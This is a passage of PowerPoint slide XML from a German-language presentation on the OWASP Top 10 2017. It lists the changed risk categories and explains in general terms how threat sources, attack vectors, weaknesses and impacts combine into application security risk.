                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mit A4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>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1800" b="1" kern="120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950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="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950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8 – Cross-Site Request </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Forgery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="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a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1700" b="1" kern="120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tab pos="3138488" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017-Unsichere Deserialisierung </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEU, Community]</a:t>
                      </a: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8"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="334800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab pos="288000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nutzung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> von Komponenten mit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>bekannten</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	Schwachstellen</a:t>
                      </a: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tab pos="485775" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017-Nutzung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> von Komponenten mit bekannten</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	Schwachstellen</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="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9"/>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950" b="1" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10 – Ungeprüfte Um- und Weiterleitungen</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>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a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="120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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab pos="522000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-Unzureichendes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Moniting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEU, Community]</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Neuerungen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2662451" y="8154996"/>
            <a:ext cx="910800" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B"/>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17852" y="7722000"/>
            <a:ext cx="615948" cy="427153"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 515"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B"/>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22"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1960978445"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939601"/>
          <a:ext cx="6854400" cy="4026430"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="311900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Was sind Sicherheitsrisiken</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> für Anwendungen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="105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688990">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE"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Angreifer können im Fall der Fälle viele unterschiedliche Angriffswege in einer Applikation ausnutzen, um Schaden für das Unternehmen oder die Organisation zu verursachen. Jeder einzelne dieser Wege stellt ein Risiko dar, das unter Umständen besondere Aufmerksamkeit bedarf.</a:t>
                      </a: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300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE"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Manche dieser Angriffswege sind sehr leicht zu finden und auszunutzen, bei anderen kann es bedeutend schwer werden.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE"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de-DE"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So unterschiedlich die Wege, so unterschiedliche sind auch die Auswirkungen: Einige sind kaum erwähnenswert, andere könnten letztlich zum Untergang des Unternehmens führen. Das individuelle Risiko kann stets nur unter Beachtung aller relevanter Faktoren abgeschätzt werden: Dabei handelt es sich um die jeweiligen Wahrscheinlichkeiten, die mit Bedrohungs-quellen, Angriffsvektoren und Schwachstellen verbunden sind. Diese werden mit den zu erwartenden technischen Auswirkungen sowie den Auswirkungen auf das Unternehmen kombiniert und bestimmen damit das individuelle Gesamtrisiko.</a:t>
                      </a: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29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="111639" y="1728662"/>
            <a:ext cx="6487794" cy="2164691"/>
            <a:chOff x="111639" y="2037864"/>
            <a:chExt cx="6487794" cy="2153136"/>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de-DE"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Schwach-</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="de-DE"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de-DE"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stelle</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de-DE" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="495300" y="2505077"/>
              <a:ext cx="139699" cy="304801"/>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE"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Angriff</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="111639" y="2089173"/>
              <a:ext cx="902811" cy="295929"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE"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Bedrohungs-</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="de-DE"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de-DE"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quellen</a:t>
              </a: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tIns="108000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE"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Auswirkung</a:t>
              </a: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de-DE"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Schwach-</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="de-DE"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de-DE"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stelle</a:t>
                </a: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de-DE" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="498475" y="2924177"/>
              <a:ext cx="139699" cy="304801"/>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE" sz="900" b="1">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>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de-DE"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Angriff</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1297061" y="2088886"/>
              <a:ext cx="665567" cy="296504"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE"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Angriffs-</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" b="1" err="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vektoren</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE"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2" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2588763" y="2140196"/>
              <a:ext cx="1055097" cy="193885"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Schwachstellen</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4449566" y="2088886"/>
